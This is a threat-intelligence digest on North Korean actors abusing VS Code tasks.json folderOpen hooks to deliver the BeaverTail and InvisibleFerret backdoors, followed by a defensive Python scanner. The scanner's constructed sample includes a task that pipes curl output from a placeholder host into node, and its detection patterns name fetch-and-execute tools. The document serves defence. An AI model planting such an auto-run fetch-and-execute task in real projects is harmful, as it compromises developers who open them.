
BeaverTail and InvisibleFerret backdoor delivery via malicious VS Code task abuse

Malware Activity
Happening score: 28
2 unique sources, 6 articles

Summary


North Korean threat actors tied to Contagious Interview are using malicious Visual Studio Code (VS Code) tasks and injected code in compromised developer repositories to spread malware through the software supply chain and steal crypto wallet credentials and other secrets. The activity also delivers the BeaverTail and InvisibleFerret backdoors, and in March Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances; the campaign also uses Tron, Aptos, and Binance Smart Chain for payload staging.

Related Happenings

GlassWorm supply-chain malware activity

Malware Activity
First: 27.05.2026 14:48 Last: 27.05.2026 14:48 Sources 1

About this happening: The **GlassWorm** malware activity is now under a coordinated **C2 disruption**, reducing its ability to deliver new instructions and payloads to infected developer systems. The o...

TeamPCP opens its offensive framework to copycat supply-chain attackers

Threat Actor Meta
First: 19.05.2026 07:54 Last: 19.05.2026 07:54 Sources 1

About this happening: **TeamPCP** has started distributing its **offensive framework source code**, turning a single supply-chain operation into reusable tradecraft that other threat actors can adopt....

Shai-Hulud worm clone activity on NPM

Malware Activity
First: 18.05.2026 12:45 Last: 18.05.2026 12:45 Sources 1

About this happening: The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

Mini Shai-Hulud supply-chain campaign targeting npm and PyPI

Campaign
First: 12.05.2026 17:45 Last: 12.05.2026 17:45 Sources 1

About this happening: The **Mini Shai-Hulud** **supply-chain campaign** linked to **TeamPCP** expanded into downstream victim reporting, including **Grafana Labs**. Grafana said its **GitHub environmen...

Latest development: 21.05.2026 11:00

Grafana Labs said its GitHub environment was accessed and its codebase downloaded, with additional internal operational information taken from GitHub repositories, after compromise linked to the Mini Shai-Hulud campaign and TanStack npm packages. Grafana said it first spotted malicious activity on May 11, discovered the unauthorized download on May 17, and after contact from the ransom gang rotated automation tokens, enabled enhanced monitoring, audited commits since the May 11 incident, and hardened its GitHub security posture, while saying there is no indication customer production systems or operations were compromised.

Timeline

  1. 22.04.2026 17:48 1 article · 1mo ago

    Contagious Interview becomes self-propagating supply chain malware

    Campaign Scope Update

    North Korean actor Void Dokkaebi, aka Famous Chollima, is turning the Contagious Interview fake-job lure into a self-propagating software supply-chain infection that abuses compromised developer repositories, malicious VS Code tasks, and injected code to spread malware and steal credentials. The campaign targets developers seeking work, can hide a poisoned .vscode folder in committed code, and Trend Micro said it found more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 commit-tampering instances in March.

  2. 20.01.2026 20:41 4 articles · 4mo ago

    Contagious Interview uses malicious VS Code projects for backdoor delivery

    Initial Disclosure

    North Korean threat actors tied to Contagious Interview used malicious Microsoft Visual Studio Code (VS Code) projects to lure developers into opening Git repositories that abuse task configuration files, including `tasks.json` and `runOn: folderOpen`, to fetch JavaScript from Vercel-hosted infrastructure and deploy backdoors on compromised endpoints. The activity includes the delivery of BeaverTail and InvisibleFerret, a macOS path that uses `nohup bash -c` and `curl -s` to pipe JavaScript into the Node.js runtime, and related variants that fall back to `grayavatar`, Tsunami (aka TsunamiKit), XMRig, and AnyDesk.

  3. 16.10.2025 17:56 1 article · 7mo ago

    UNC5342 adopts EtherHiding for Contagious Interview delivery

    Technical Analysis Update

    Google Threat Intelligence Group attributed the use of EtherHiding since February 2025 to UNC5342, a North Korean threat cluster also tracked as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, and Void Dokkaebi. The technique distributes malware and enables cryptocurrency theft through BNB Smart Chain (BSC) or Ethereum smart contracts, alongside the Contagious Interview chain that uses npm packages, BeaverTail, JADESNOW, and InvisibleFerret against Windows, macOS, and Linux systems.

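A defender-side check for the `tasks.json` / `runOn: folderOpen` pattern described in timeline entry 2, added here as an example and not taken from any of the cited reports. The sample `tasks.json`, the indicator names, and the `example.invalid` URL are constructed for the demonstration.

```python
"""Flag auto-running VS Code tasks in a repository's .vscode/tasks.json.

Heuristics only: a task that runs on folderOpen and whose command fetches
remote content and pipes it into an interpreter is the pattern described
above. Review any hit by hand; a benign repo can legitimately use folderOpen.
"""
import json
import re

# Indicator regexes (constructed), matched against the flattened command line.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "piped_to_interpreter": re.compile(r"\|\s*(node|bash|sh|python3?|powershell)\b", re.I),
    "detached": re.compile(r"\bnohup\b|&\s*$"),
}

def load_tasks(text):
    """Parse tasks.json, tolerating // line comments and trailing commas (JSONC)."""
    stripped = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("//"))
    stripped = re.sub(r",(\s*[}\]])", r"\1", stripped)
    return json.loads(stripped).get("tasks", [])

def task_command(task):
    """Join command, args and any OS-specific overrides into one searchable string."""
    parts = [task.get("command", ""), *map(str, task.get("args", []))]
    for os_key in ("windows", "osx", "linux"):
        if os_key in task:
            parts.append(task_command(task[os_key]))
    return " ".join(p for p in parts if p)

def assess_task(task):
    """Return the list of findings for one task (empty list means nothing flagged)."""
    findings = []
    if task.get("runOptions", {}).get("runOn") == "folderOpen":
        findings.append("auto-runs on folderOpen")
    cmd = task_command(task)
    findings.extend(name for name, rx in INDICATORS.items() if rx.search(cmd))
    return findings

def scan_tasks_json(text):
    """Map task label -> findings for every task that triggered at least one indicator."""
    report = {}
    for task in load_tasks(text):
        findings = assess_task(task)
        if findings:
            report[task.get("label", "<unlabelled>")] = findings
    return report

# Constructed sample: one benign build task, one task shaped like the lure described above.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not a real repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "setup", "type": "shell",
     "command": "nohup bash -c \"curl -s https://example.invalid/payload.js | node\" &",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}'''

if __name__ == "__main__":
    for label, findings in scan_tasks_json(SAMPLE_TASKS_JSON).items():
        print(f"{label}: {', '.join(findings)}")
```

Run it over every `.vscode/tasks.json` in a freshly cloned repository before opening the folder in VS Code; a task that matches only `auto-runs on folderOpen` is a review item, while one that also matches `remote_fetch` and `piped_to_interpreter` is the combination the reports above describe.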